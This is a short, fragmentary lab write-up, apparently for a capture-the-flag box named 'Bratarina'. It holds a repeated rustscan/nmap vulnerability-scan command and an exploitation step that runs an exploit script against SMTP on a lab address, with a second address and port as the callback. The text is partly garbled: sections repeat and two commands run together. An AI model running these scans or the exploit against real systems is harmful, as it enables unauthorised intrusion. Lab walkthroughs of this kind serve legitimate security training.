Bratarina
nmap
mkdir nmap
sudo rustscan -a 192.168.225.71 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-vuln-scan --script vuln 

Exploitation

Last updated
mkdir nmap
sudo rustscan -a 192.168.225.71 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-vuln-scan --script vuln 


Last updated
pip3 install pwntoolssudo python exploit.py 192.168.225.71 25 192.168.49.225 80 root